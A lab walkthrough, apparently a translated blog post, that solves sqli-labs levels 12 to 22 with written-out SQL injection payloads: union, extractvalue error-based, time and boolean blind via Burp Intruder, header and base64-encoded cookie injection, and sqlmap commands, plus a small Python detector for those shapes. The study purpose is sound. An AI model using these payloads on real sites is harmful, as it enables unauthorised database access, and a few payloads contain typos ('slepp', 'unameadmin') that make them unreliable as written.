uname=admin"+or+1%3D1+--+&passwd=1234&submit=Submit

Output:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

Me???

Angrily messed around:

uname=admin"5678+or+1%3D1+--+&passwd=1234&submit=Submit

Output:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '5678 or 1=1 -- ") and password=("1234") LIMIT 0,1' at line 1

Now it shows: what follows is "), so add a parenthesis to close it; order by 2 and order by 3 respectively confirm two columns

uname=admin123455")+order by 3--+&passwd=1234&submit=Submit

Output the current database~

uname=admin123455")+union select 1,database()--+&passwd=1234&submit=Submit

Output:

<br>Your Login name:1<br>Your Password:security<br>

For the rest refer to Less-11

Summary

Compared with the previous level, the single-quote closure just becomes a ") closure, the same as the previous ten levels; the later ones probably won't be the same again, and then after the blind levels it's over, I guess

Sigh, I feel my focus isn't quite enough; only a few levels done and it took this long, useless


Less-13

date:2020-11-21 18:08:01

Process

sqlmap

Same as Less-11

Manual injection

Blind guess that this level closes with ')), payload:

uname=admin%27%29%29+or+1%3D1+--+23&passwd=32&submit=Submit

Output:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') or 1=1 -- 23') and password=('32') LIMIT 0,1' at line 1

Oh ho, it closes with '), annoying! Close it:

uname=admin') or 1=1+--+23&passwd=32&submit=Submit

The output is only an image, which means the closure succeeded; no data echo

Then use errors to read data; I have used the error-based injection functions less anyway

extractvalue(target xml document, xml path) is used to query an xml document

The second parameter, the position in the xml, is where we can operate: positions in an xml document are looked up in the format /xxx/xxx/xxx/…; if we write something in another format, it errors and returns the illegal content we wrote, and that illegal content is exactly what we want to query

payload:

uname=admin') and extractvalue(1,concat('~',database()))+--+23&passwd=32&submit=Submit

Output gives the current database name:

XPATH syntax error: '~security

To get other data, change the payload at the xml path position; refer to Less-11

Summary

A summary of ten SQL error-based injection techniques


Less-14

date:2020-11-21 19:47:21

Process

sqlmap

Same as Less-11

Manual injection

Closes directly with a double quote, payload:

uname=admin" order by 666+--+&passwd=123&submit=Submit

Output:

Unknown column '666' in 'order clause'

Once it closes, any of the previous methods can be used to fetch data; use error-based injection to get the database name:

uname=admin" and extractvalue(1,concat('~',database()))+--+&passwd=123&submit=Submit

Output:

XPATH syntax error: '~security'

The rest is the same as Less-11

Summary

Well, nothing much


Less-15

date:2020-11-21 20:03:27

Process

sqlmap

Same as Less-11

Manual injection

From the title, boolean-based blind; fine, capture with Burp

After closing the single quote and appending order by 2, it returns flag.jpg

Appending order by 3, it returns slap.jpg

Obviously flag.jpg means a successful login

So the single quote closes successfully and two columns are needed:

uname=admin' order by 3+--+&passwd=&submit=Submit

Still use if first to get the length of the database name; with the following payload the server sleeps for quite a while before waking up, so the length is 8!

uname=admin' and if( length(database())=8,sleep(23),1 )+--+&passwd=&submit=Submit

Guessing one character at a time is grunt work, so leave it to Burp

Right-click send to Intruder, attack type cluster bomb:

POST /Less-15/ HTTP/1.1
Host: www.sqli-labs.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://www.sqli-labs.com/Less-15/
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
Origin: http://www.sqli-labs.com
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

uname=admin' and if( ascii(substr(database(),§1§,1))=§8§,sleep(23),1 )+--+&passwd=&submit=Submit

The first parameter from 1-8, the second from 1-127; finally pull the database name out from the ASCII values. For dumping columns refer to Less-11

request payload1 payload2 status timeout error length
787 3 99 200 false false 1691
802 2 101 200 false false 1691
838 6 105 200 false false 1691
909 5 114 200 false false 1691
913 1 115 200 false false 1691
927 7 116 200 false false 1691
932 4 117 200 false false 1691
968 8 121 200 false false 1691
0 200 false false 1737
2 2 1 200 false false 1737
1 1 1 200 false false 1737
3 3 1 200 false false 1737

Summary


Less-16

date:2020-11-21 22:33:47

Process

sqlmap

Same as Less-11

Manual injection

Entering admin") or 1=1 -- as the username logs in directly; don't forget the space after --

Because the judgment can be made from which image is shown, either time-based or boolean-based blind would work; the previous level used boolean-based, so here time-based is used

Old routine, first confirm the database name length is 8:

admin") and length(database())=8 -- 

Then grunt work with Burp, send to Intruder:

POST /Less-16/ HTTP/1.1
Host: www.sqli-labs.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://www.sqli-labs.com/Less-16/
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
Origin: http://www.sqli-labs.com
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

unameadmin") and if(ascii(substr(database(),§1§,1))=§8§,slepp(23),1)--+&passwd=&submit=Submit

The first parameter from 1-8, the second from 1-127; finally pull the database name out from the ASCII values. For dumping columns refer to Less-11

request payload1 payload2 status timeout error length
787 3 99 200 false false 1712
802 2 101 200 false false 1712
838 6 105 200 false false 1712
909 5 114 200 false false 1712
913 1 115 200 false false 1712
927 7 116 200 false false 1712
932 4 117 200 false false 1712
968 8 121 200 false false 1712
0 200 false false 1749
1 1 1 200 false false 1749

Summary

Burp is great, sqlmap is great, grunt work is hard


Less-17(sqlmaping)

date:2020-11-21 22:54:56

Process

Happy again seeing the title: not blind injection

sqlmap

Capture with Burp, right-click copy to file to generate 17.txt

python sqlmap.py -r 17.txt --risk=3 --dbs --batch

The rest is the same as Less-11

Manual injection

Entered admin' or 1=1 -- as the username

It actually returned bug off,you silly dump hacker

Oh ho, insulting me; I'm coming for you, just wait

I suspected the backend checks the user input; after countless attempts and countless insults, I decided to sneak a look at the source code

The source limits uname to 15 characters, which alone is crippling; after reading the whole source I realised this is a password reset form, and the source puts no restriction on passwd

Blind as I am, I chose time-based blind injection; Burp send to repeater:

uname=admin&passwd=1' where 1=1 and if( length(database())=8,sleep(10),1 )--+&submit=Submit

Haha, the server fell asleep; from here time-based blind injection works, same as the levels above

Summary

It feels like blind injection is still the most used

The fastest manual blind injection is binary search, but I'm someone who has Burp!

  1. --risk=RISK risk level (1-4, default 1). Raising the risk level increases the risk of data being modified. risk 2: event-based tests; risk 3: tests with or statements; risk 4: update tests

Less-18

date:2020-11-22 00:19:07

Process

The page hints Your IP ADDRESS is: 127.0.0.1; I know this one! It must be XFF header injection! (It wasn't)

sqlmap

Capture with Burp, right-click copy to file to generate 18.txt

python sqlmap.py -r 18.txt --level=5 --risk=3 --dbs --batch

The rest is the same as Less-11

Manual injection

Since it isn't the XFF header, let's look at the source

The source checks the username and password; that check has to be passed before header injection is possible, and conveniently the previous level reset the password

So enter the matching username and password and inject in the User-Agent. First a single quote to trigger an error:

POST /Less-18/ HTTP/1.1
Host: www.sqli-labs.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0'
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://www.sqli-labs.com/Less-18/
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: http://www.sqli-labs.com
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

uname=admin&passwd=1&submit=Submit

Output:

<br>Your IP ADDRESS is: 127.0.0.1<br><font color= "#FFFF00" font size = 3 ></font><font color= "#0000ff" font size = 3 >Your User Agent is: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0'</font><br>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '127.0.0.1', 'admin')' at line 1<br><br><img src="../images/flag.jpg"  /><br>

Logically this has to be an insert operation, so it's insert injection; the source is indeed an insert. Actually whatever kind of injection it is, as long as we roughly know the SQL statement and can get the database to execute our code, that is enough

Use error-based injection to get database(), payload:

POST /Less-18/ HTTP/1.1
Host: www.sqli-labs.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0',1,extractvalue(1,concat('~',database())))# 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://www.sqli-labs.com/Less-18/
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: http://www.sqli-labs.com
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

uname=admin&passwd=1&submit=Submit

Output, got the current database security:

<br>Your IP ADDRESS is: 127.0.0.1<br><font color= "#FFFF00" font size = 3 ></font><font color= "#0000ff" font size = 3 >Your User Agent is: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0',1,extractvalue(1,concat('~',database())))#</font><br>XPATH syntax error: '~security'<br><br><img src="../images/flag.jpg"  /><br>

For dumping column values afterwards, same as Less-11; just adjust the payload

Summary

Reading the source is like cheating on an exam: guilty conscience (eager to try)

  1. The level parameter:

1> Detection level: --level 5

--level 5 refers to the level of tests to run

There are 5 levels (1-5); without level, the default is 1

Level 5 contains the most payloads and will automatically test header injection such as cookie and XFF; correspondingly it is also slower.

level=2 tests the http cookie

level=3 tests the http user-agent/referer headers

When unsure which payload or parameter is the injection point, a high level value is recommended.


Less-19

date:2020-11-22 10:01:30

Process

sqlmap

Capture with Burp, right-click copy to file to generate 19.txt

python sqlmap.py -r 19.txt --level=5 --risk=3 --dbs --batch

The rest is the same as Less-11

Manual injection

From the title, Referer injection; it looks like the levels from here on are all header injection

Open hackbar, click post data, enter the correct username and password; it shows my referer is such-and-such, confirming again that it is Referer header injection

Not sure why, but when hackbar sets post data and the referer at the same time, the referer has no effect; on to Burp:

POST /Less-19/ HTTP/1.1
Host: www.sqli-labs.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://www.sqli-labs.com/Less-19/'
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: http://www.sqli-labs.com
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

uname=admin&passwd=1&submit=Submit

Output:

<br>Your IP ADDRESS is: 127.0.0.1<br><font color= "#FFFF00" font size = 3 ></font><font color= "#0000ff" font size = 3 >Your Referer is: http://www.sqli-labs.com/Less-19/'</font><br>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '127.0.0.1')' at line 1<br><br><img src="../images/flag.jpg" /><br>

An insert operation again; use error-based injection with extractvalue() to get the current database name

POST /Less-19/ HTTP/1.1
Host: www.sqli-labs.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://www.sqli-labs.com/Less-19/', extractvalue(1,concat('~',database()))) # 
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://www.sqli-labs.com
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

uname=admin&passwd=1&submit=Submit 

From the output, got the current database name security:

<br>Your IP ADDRESS is: 127.0.0.1<br><font color= "#FFFF00" font size = 3 ></font><font color= "#0000ff" font size = 3 >Your Referer is: http://www.sqli-labs.com/Less-19/', extractvalue(1,concat('~',database()))) #</font><br>XPATH syntax error: '~security'<br><br><img src="../images/flag.jpg" /><br>

The rest is the same as Less-11

Summary

New sqlmap usage; it feels like sqlmap isn't up to it anymore? More likely I'm the one who isn't. Off to Baidu for sqlmap usage


Less-20

date:2020-11-22 10:17:02

Process

sqlmap

Capture with Burp, right-click copy to file to generate 20.txt

python sqlmap.py -r 22.txt --level=5 --risk=3 --dbs --batch

The rest is the same as Less-11

Manual injection

First log in with admin\1

The page shows me my cookie:

YOUR USER AGENT IS : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0YOUR IP ADDRESS IS : 127.0.0.1DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIREYOUR COOKIE : uname = admin and expires: Sun 22 Nov 2020 - 11:22:50Your Login name:adminYour Password:1Your ID:8

So cookie injection it is; capture with Burp

GET /Less-20/index.php HTTP/1.1
Host: www.sqli-labs.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://www.sqli-labs.com/Less-20/index.php
DNT: 1
Connection: close
Cookie: uname=admin
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

Start with a single quote after the cookie value

Cookie: uname=admin'

Output:

Issue with your mysql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin'' LIMIT 0,1' at line 1

Got the rest of the SQL statement, so start the usual closing routine and fetch database()

payload:

Cookie: uname=admin' and extractvalue(1,concat('~',database())) # 

Output, got the database name security:

Issue with your mysql: XPATH syntax error: '~security'

Fetching column contents is the same as Less-11

Summary

Error-based injection is really handy

Having written the earlier levels, the later ones go faster and faster, happy


Less-21

date:2020-11-22 10:29:18

Process

sqlmap

Capture with Burp, right-click copy to file to generate 21.txt

python sqlmap.py -r 22.txt --level=5 --risk=3 --dbs --batch

The rest is the same as Less-11

Manual injection

Old routine: enter the account and password reset in level 17, admin/1

The level is still cookie injection:

YOUR USER AGENT IS : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0YOUR IP ADDRESS IS : 127.0.0.1DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIREYOUR COOKIE : uname = YWRtaW4= and expires: Sun 22 Nov 2020 - 11:29:55Your Login name:adminYour Password:1Your ID:8

The title says it is the complex version...

Ah, try a quote first; it no longer errors!

Interesting

Looking at the page, the uname part has changed; the capture shows uname is YWRtaW4, try changing it to admin

Cookie: uname=admin"

Output

Issue with your mysql: Illegal mix of collations (gbk_chinese_ci,IMPLICIT) and (latin1_swedish_ci,COERCIBLE) for operation '='

It says it is a character set problem; fine, off to Baidu for the walkthrough guide

The cookie value is base64-processed; everything else is the same as level 20

That is, when injecting, the injection statement has to be encoded: open hackbar, enable base64 encoding, enter admin'

Send with Burp, setting the cookie

Cookie: uname=YWRtaW4n

Output:

Issue with your mysql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin'') LIMIT 0,1' at line 1

Got the rest of the statement, so start closing and injecting. For some reason the encoded error-based payload I put in got no reaction; switching to a different encoding tool fixed it

Use error-based injection to fetch data

Plaintext: admin') and extractvalue(1,concat(',',database())) # 
base64 encoded: YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCcsJyxkYXRhYmFzZSgpKSkgIyA=
Set the cookie: Cookie: uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCcsJyxkYXRhYmFzZSgpKSkgIyA=

Output:

YOUR COOKIE : uname = YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCcsJyxkYXRhYmFzZSgpKSkgIyA= and expires: Sun 22 Nov 2020 - 12:30:51<br></font>Issue with your mysql: XPATH syntax error: ',security'

Got the database name; fetching other data is the same as Less-11

Summary

Where base64 is used and how it works

base64 was originally used in the mail transfer protocol, because the mail transfer protocol only supports transferring ASCII characters, so binary files such as images and videos could not be transmitted.

So base64 can be used to encode binary file content into content that contains only ASCII characters.

We know that any data in a computer is stored as ASCII codes, and the values 128~255 of ASCII are invisible characters. When data is exchanged over the network, say from A to B, it often passes through several routing devices, and since different devices handle characters somewhat differently, those invisible characters may be processed incorrectly, which is bad for transmission. So the data is first base64-encoded so that it all becomes visible characters, which greatly reduces the chance of errors.


Less-22

date:2020-11-22 11:35:53

Process

sqlmap

Capture with Burp, right-click copy to file to generate 22.txt

python sqlmap.py -r 22.txt --level=5 --risk=3 --dbs --batch

The rest is the same as Less-11

Manual injection

Still log in with admin\1; it shows the cookie, so it is still cookie injection

YOUR USER AGENT IS : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0YOUR IP ADDRESS IS : 127.0.0.1DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIREYOUR COOKIE : uname = YWRtaW4= and expires: Sun 22 Nov 2020 - 12:37:26Your Login name:adminYour Password:1Your ID:8

Seeing uname = YWRtaW4= , it should still be base64 encoding

Use the payload from the previous level

Plaintext: admin') and extractvalue(1,concat(',',database())) # 
base64: YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKD
EsY29uY2F0KCcsJyxkYXRhYmFzZSgpKSkgIyA=

No error is shown, which means the closure failed; the title says double-quote closure, so change the quote

Plaintext: admin") and extractvalue(1,concat(',',database())) # 
base64: YWRtaW4iKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCcsJyxkYXRhYmFzZSgpKSkgIyA=

Output:

Issue with your mysql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') and extractvalue(1,concat(',',database())) # " LIMIT 0,1' at line 1

Got the rest of the SQL statement: only one double quote needs closing, no ). Go

Plaintext: admin" and extractvalue(1,concat(',',database())) # 
base64: YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoJywnLGRhdGFiYXNlKCkpKSAjIA==

Output:

Issue with your mysql: XPATH syntax error: ',security'

Got the database name; fetching other data is the same as Less-11

Summary

I find sqlmap runs a bit slowly
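Levels 18 to 22 move the injection out of the form fields and into the User-Agent, the Referer and the uname cookie, and in Less-21/22 the cookie is base64-wrapped, which hides the quote and the extractvalue() call from any check that only looks at the raw value. As an added example (not from the post), the inspector below walks the header fields of a request, splits the Cookie header, strictly base64-decodes each cookie value that decodes cleanly, and matches both the raw and decoded text against the two shapes used on this page: an error-based function call and a quote followed by and/or/union or a comment marker. The request dictionaries are constructed; the Less-21 plaintext is the one quoted above and is encoded in the code itself.

```python
"""Inspect header and cookie values, base64-decoded where applicable, for the
injection shapes used in Less-18 to Less-22. Added example with constructed
requests; not the lab's code."""
import base64
import re

ERROR_BASED = re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I)
QUOTE_BREAK = re.compile(r"['\"]\s*\)*\s*(?:(?:and|or|union)\b|#|--)", re.I)
SIGNATURES = (("error_based", ERROR_BASED), ("quote_break", QUOTE_BREAK))


def try_base64(value: str):
    """Strictly decode base64 to text; None when the value is not base64, so
    plain cookies such as admin' are left alone rather than mis-decoded."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except ValueError:        # binascii.Error and UnicodeDecodeError both derive from it
        return None


def parse_cookies(header: str) -> dict:
    """Split a Cookie header into name -> value (first '=' separates them)."""
    out = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            out[name.strip()] = value.strip()
    return out


def inspect_headers(headers: dict) -> list:
    """Return (field, signature) pairs for every header or cookie value,
    decoded form included, that carries one of the injection shapes."""
    candidates = []
    for name, value in headers.items():
        if name.lower() != "cookie":
            candidates.append((name, value))
            continue
        for ck, cv in parse_cookies(value).items():
            candidates.append((f"cookie:{ck}", cv))
            decoded = try_base64(cv)
            if decoded is not None:
                candidates.append((f"cookie:{ck}(base64)", decoded))
    return [(field, sig) for field, value in candidates
            for sig, rx in SIGNATURES if rx.search(value)]


# Constructed requests. The Less-21 plaintext is the one quoted on the page;
# it is base64-encoded here the same way the level expects it in the cookie.
LESS21_PLAINTEXT = "admin') and extractvalue(1,concat(',',database())) # "
UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
ENCODED_COOKIE_REQUEST = {
    "User-Agent": UA,
    "Referer": "http://www.sqli-labs.com/Less-21/index.php",
    "Cookie": "uname=" + base64.b64encode(LESS21_PLAINTEXT.encode()).decode(),
}
HEADER_REQUEST = {   # the Less-18 User-Agent and Less-19 Referer shapes
    "User-Agent": UA + "',1,extractvalue(1,concat('~',database())))#",
    "Referer": "http://www.sqli-labs.com/Less-19/', extractvalue(1,concat('~',database()))) #",
}
BENIGN_REQUEST = {
    "User-Agent": UA,
    "Referer": "http://www.sqli-labs.com/Less-20/index.php",
    "Cookie": "uname=YWRtaW4=",   # base64("admin"): the legitimate login cookie
}


if __name__ == "__main__":
    for label, req in (("encoded cookie", ENCODED_COOKIE_REQUEST),
                       ("headers", HEADER_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, "->", inspect_headers(req))
```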

posted @ 2021-06-24 16:20  milkii0